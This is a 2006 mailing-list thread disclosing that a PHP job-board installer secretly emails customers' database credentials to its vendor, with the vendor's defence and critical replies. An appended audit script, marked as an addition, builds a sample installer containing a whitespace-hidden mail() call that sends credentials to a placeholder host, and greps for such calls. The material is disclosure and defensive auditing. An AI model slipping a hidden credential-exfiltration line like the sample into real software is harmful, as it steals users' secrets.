Re: [Info Disclosure] Diesel PHP Job Site Latest Version
In response to the DieselScripts reaction, we have contacted them and told them we should write an article about them and their way of working. They came up with the same reason why they use this phone-home procedure, and some shocking details about the way they use it. In the end we got them to remove the phone-home procedure ;)

The article itself is at http://www.securityview.org/dieselscripts-or-how-a-small-company-is-making-the-errors-a-big-one-cant.html

With regards,
Ronald van den Blink
SecurityView.org

On 31 May, 2006, at 15:20, John F Flynn III wrote:

> As a systems administrator, I must say that your methods are unacceptable. You are violating your customers' trust by doing this without their knowledge. You even made an effort to hide the code that sends the information! This is outright deceit and should not be tolerated by anyone.
>
> Regardless of your motives, this deceitfulness must be exposed for all to know about. Perhaps you should trust your customers more. As word of this gets out, you are likely to have a lot fewer of them. I just feel sorry for those who do not find out in time and have their systems compromised because login credentials and other information were sent clear-text over the Internet.
>
> -John
>
> [EMAIL PROTECTED] wrote:
>
> > Hello,
> >
> > To explain this to all visitors, the information is used to prevent any unauthorized copies from running on the web.
> >
> > All of the php developers that sell products online use this method or even more methods.
> >
> > Please stop making such a big deal out of this because it's our way of protecting our work and business.
> >
> > Thank you for understanding!
> >
> > DieselScripts Staff
> > www.dieselscripts.com
>
> --
> John Flynn  [EMAIL PROTECTED]
> Systems and Network Administration   /\_/\
> School of Computer Science          ( O.O )
> Florida International University     >   <
Re: [Info Disclosure] Diesel PHP Job Site Latest Version
As a systems administrator, I must say that your methods are unacceptable. You are violating your customers' trust by doing this without their knowledge. You even made an effort to hide the code that sends the information! This is outright deceit and should not be tolerated by anyone.

Regardless of your motives, this deceitfulness must be exposed for all to know about. Perhaps you should trust your customers more. As word of this gets out, you are likely to have a lot fewer of them. I just feel sorry for those who do not find out in time and have their systems compromised because login credentials and other information were sent clear-text over the Internet.

-John

[EMAIL PROTECTED] wrote:

> Hello,
>
> To explain this to all visitors, the information is used to prevent any unauthorized copies from running on the web.
>
> All of the php developers that sell products online use this method or even more methods.
>
> Please stop making such a big deal out of this because it's our way of protecting our work and business.
>
> Thank you for understanding!
>
> DieselScripts Staff
> www.dieselscripts.com

--
John Flynn  [EMAIL PROTECTED]
Systems and Network Administration   /\_/\
School of Computer Science          ( O.O )
Florida International University     >   <
Re: [Info Disclosure] Diesel PHP Job Site Latest Version
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

"All of the php developers that sell products online use this method"

Uh no, it doesn't work like that, sorry.

If the original report is true and you were receiving the private database passwords etc. of your customers, then you are doing something that is negligent, deceiving, and possibly breaking some laws.

I have worked for a large number of reputable software companies and their "phone home" scripts usually work like this.

1) The bit that phones home is usually encoded with something like Zend Accelerator or ionCube so that it is more difficult to tamper with.

2) When the script phones home it is usually with some sort of license key, and sometimes includes your domain name and other minor details.

I have reviewed many proprietary code bases that use these phone home methods, and all of the ones I have seen are harmless, and justified in the data they are requesting. Never once have I seen a legitimate application use phone home methods to send database credentials.

Would you please name for us one application that phones home with credential information?

Kind Regards,
James

[EMAIL PROTECTED] wrote:
> Hello,
>
> To explain this to all visitors, the information is used to prevent any
> unauthorized copies from running on the web.
>
> All of the php developers that sell products online use this method or even
> more methods.
>
> Please stop making such a big deal out of this because it's our way of
> protecting our work and business.
>
> Thank you for understanding!
>
> DieselScripts Staff
> www.dieselscripts.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)

iQIVAwUBRHzggNR/maLeH1kRAQpdCA//fE/SbaGU2YPYNL3iZHp2DK9zOJHi+cKV
8Ln3g0F80Sj2jeETuLm6DvijS5E4xtXU1KzNHJpgMcQLKf+yI54LJWc3MxJDQeXE
9uW995J36xb5EBfSbdceI8QGK9XQUrG1C2AfXOM0JK1EeuSGd7O9LF+k8QAGh8Bk
9Jw2n6zopfFwxP1cP12dHZPbSPCk0wdwZrokn9jplZK4QIyH9mRBYG+XnnJlXtt8
/uj+5YS9U7KKuycM4WTwCUXiRI1vkFOudmpxv7qlSg7Cpbk7Jd+Efc+MvDcDBT6e
iHSb14ivFna6sv02zg8Gg9bMllRSfLkucFgfUza9G4v5XfMmBh3BHDx5ujkGXml9
ZFrVmaX5mNgFYuEFQr638ZdvAOqEtnQ+xrjiQG623rNo8NFlIPJBlhviR2qaiupt
go4HoH12x1D2Msi6dmI7OHr8i9DzKhOCs9InHoGVRNq2XJTPjljywSJgV1f+VFwh
y8jZzjzTi1SD3e0HMEaSiGbkYv3wEgTTuWnLzSvfYLLZ3gJMpNOmGc1gd7Y6b9wF
8w+tjVMkdow8EU1PdKv0Pacbh7Qx39yDwomW15YNgt6aKYoCQp10XsCH9U3MNSql
9pEyLItMyy3oyiYyOilPz1nAeaI1rvEAatZ4ddvQHdXa4Ly1fCKSIsEd+AEOpGxx
ua+s3V3PkSQ=
=yeV+
-----END PGP SIGNATURE-----
Re: [Info Disclosure] Diesel PHP Job Site Latest Version
Hello,

To explain this to all visitors, the information is used to prevent any unauthorized copies from running on the web.

All of the php developers that sell products online use this method or even more methods.

Please stop making such a big deal out of this because it's our way of protecting our work and business.

Thank you for understanding!

DieselScripts Staff
www.dieselscripts.com
[Info Disclosure] Diesel PHP Job Site Latest Version
Subject: [Info Disclosure] Diesel PHP Job Site Latest Version
Severity: Pretty Bad
Title: Diesel PHP Job Site Latest Version Information Disclosure
Home Page: http://www.dieselscripts.com/
Product Page: http://www.dieselscripts.com/diesel-job-site.html
Date: May 17, 2006

Synopsis:

When an unsuspecting user installs this software on their webserver, all information is emailed back to the original programmers of this software. This information is sent from install.php, which includes the database host, database name, username, and password used to connect.

Background:

This script allows job seekers to post their resumes and search job postings for free and employers pay a fee to post jobs and search the resumes online. Free posting and searching is also possible.

Information:

I run a VOIP Jobs site tailored to the Asterisk Community. As I do not have much money or investors I couldn't afford some swanky ass Job Board. I found this one, which was relatively cheap, but required register_globals. I bought it anyway (mistake #1). So, I thought I would be nice, and edit their software to remove this requirement. While I was looking through the code I found this little gem in the install file.

Details:

In install.php, line 31, there is a call to a mail function that emails [EMAIL PROTECTED] with your username, email, database credentials, hosts and passwords. Due to their licensing agreement I'm not actually allowed to post the offending line of code from the file.

It's worth mentioning that they also tried to hide this from unsuspecting users by tabbing it across the screen a number of times so it was hidden if scrolling without wordwrap on. Sneaky bastards.

Fix/Workaround:

1. Don't use this software
2. Use it, but first comment/delete that line from install.php
3. Disable the ability to send mail from PHP/Server
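A pre-install audit for the two things the advisory describes, a mail() call carrying database credentials and a line pushed off-screen with leading whitespace, as an added example that is not part of the advisory and not DieselScripts' code. The install.php it writes is constructed for the demonstration; the function names, the set of outbound PHP calls it greps for, and the 40-blank threshold are assumptions:

```shell
#!/bin/sh
# Added example (constructed; not the vendor's install.php): scan a PHP
# installer for outbound calls that mention credential-looking identifiers
# and for lines hidden behind long runs of leading blanks.

write_sample_install() {
    # $1: path to write. A made-up installer with one credential-carrying
    # mail() call indented far to the right so it scrolls out of view.
    cat > "$1" <<'EOF'
<?php
$db_host = 'localhost';
$db_name = 'jobsite';
$db_user = 'jobuser';
$db_pass = 'CHANGEME';
$link = mysql_connect($db_host, $db_user, $db_pass);
mysql_select_db($db_name, $link);
                                                                        mail('vendor@example.invalid', 'New install', "$db_host $db_name $db_user $db_pass");
echo "Install complete";
EOF
}

find_credential_exfil() {
    # $1: PHP file. Print "line:content" for calls that can leave the host
    # (mail, fsockopen, curl_exec, file_get_contents) whose arguments mention
    # credential-looking identifiers. Assumed list; extend for your codebase.
    grep -n -E '(mail|fsockopen|curl_exec|file_get_contents)[[:space:]]*\(' "$1" \
        | grep -i -E 'pass|user|host|secret'
}

find_hidden_lines() {
    # $1: PHP file. Print lines indented with more than 40 blanks (spaces or
    # tabs), the hiding trick the advisory describes. Threshold is assumed.
    awk '{ if (match($0, /^[[:blank:]]+/) && RLENGTH > 40)
               print NR ": " RLENGTH " leading blanks before: " substr($0, RSTART + RLENGTH, 40) }' "$1"
}

count_credential_exfil() { find_credential_exfil "$1" | wc -l | tr -d ' '; }
count_hidden_lines()     { find_hidden_lines "$1" | wc -l | tr -d ' '; }

audit_install_script() {
    # $1: PHP file. Report both findings; exit status 1 if anything was flagged.
    exfil=$(count_credential_exfil "$1")
    hidden=$(count_hidden_lines "$1")
    echo "== $1: $exfil credential-carrying outbound call(s), $hidden hidden line(s)"
    find_credential_exfil "$1"
    find_hidden_lines "$1"
    [ "$exfil" -eq 0 ] && [ "$hidden" -eq 0 ]
}

# Stand-alone run on the constructed sample.
sample=$(mktemp)
write_sample_install "$sample"
audit_install_script "$sample" || echo "flagged: review before installing"
rm -f "$sample"
```

Run it over an unpacked package before install.php is ever executed; a hit on either check is reason to read the line in full with word wrap on. Workaround 3 in the advisory maps to the php.ini directive `disable_functions = mail`, which makes any mail() call in the installer fail rather than deliver, though the audit is still worth doing because the same data could be sent by other means.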